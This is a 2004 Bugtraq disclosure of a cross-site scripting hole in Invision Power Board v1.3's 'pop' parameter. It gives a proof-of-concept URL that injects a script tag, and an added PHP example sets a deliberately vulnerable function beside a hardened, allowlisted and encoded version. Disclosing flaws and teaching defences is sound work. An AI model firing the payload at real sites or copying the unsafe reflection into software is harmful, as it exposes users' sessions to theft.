[34075] in bugtraq


Invision Power Board v1.3 Final Cross Site Scripting 2 - Addon

daemon@ATHENA.MIT.EDU (Rafel Ivgi, The-Insider)
Tue Mar 9 12:28:19 2004

Message-ID: <004501c40598$ecb26a60$0b3016ac@fucku>
Reply-To: "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
From: "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
To: "bugtraq" <bugtraq@securityfocus.com>
Cc: "SecurITeam News" <news@securiteam.com>,
        "securitytracker" <bugs@securitytracker.com>
Date: Tue, 9 Mar 2004 07:39:43 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="windows-1255"
Content-Transfer-Encoding: 7bit

Hi Everyone!
I just found more XSS in the "Invision Power Board v1.3 Final" forum.
This is the new hole:
http://<host>/forum//index.php?s=&act=chat&pop=1;'><script>alert('this could be your cookie')</script><plaintext>
It is in the "pop" field.

Rafel Ivgi, The-Insider.
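
Added example (not part of the original post and not Invision Power Board source code): the unescaped-reflection pattern this report implies for the "pop" field, beside a hardened form that allowlists the value and encodes it for the attribute context. It assumes "pop" is a 0/1 flag echoed into a single-quoted HTML attribute; the function names and the markup are hypothetical.

```php
<?php
// Added example, not Invision Power Board code.
// Assumption: 'pop' is a 0/1 flag that ends up inside a single-quoted
// HTML attribute. All function names below are hypothetical.

// Vulnerable pattern: the raw request value is concatenated into markup,
// so a quote in the value terminates the attribute.
function render_chat_link_unsafe(array $query): string
{
    $pop = $query['pop'] ?? '0';
    return "<a href='index.php?act=chat&amp;pop=" . $pop . "'>Chat</a>";
}

// Input validation: accept only the values the flag can legitimately take.
// Arrays (pop[]=x), signs, whitespace and markup all fall back to 0.
function parse_pop(array $query): int
{
    $raw = $query['pop'] ?? '0';
    if (!is_string($raw) || !in_array($raw, ['0', '1'], true)) {
        return 0;
    }
    return (int) $raw;
}

// Output encoding: build the query string with http_build_query(), then
// encode the whole URL for a quoted attribute. ENT_QUOTES matters here
// because the attribute is single-quoted.
function render_chat_link_safe(array $query): string
{
    $href = 'index.php?' . http_build_query([
        'act' => 'chat',
        'pop' => parse_pop($query),
    ]);
    return "<a href='" . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . "'>Chat</a>";
}

// Constructed sample input modelled on the report, with a benign marker
// element in place of a script.
$query = ['act' => 'chat', 'pop' => "1;'><b>marker</b>"];

// Unsafe: the quote closes href early and <b> is parsed as an element.
echo render_chat_link_unsafe($query), "\n";
// Safe: the value is rejected, pop becomes 0, and nothing escapes the attribute.
echo render_chat_link_safe($query), "\n";
```

Validation and encoding are kept separate on purpose: the allowlist rejects the malformed flag, and the attribute encoding still holds if another parameter is later added to the same link.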

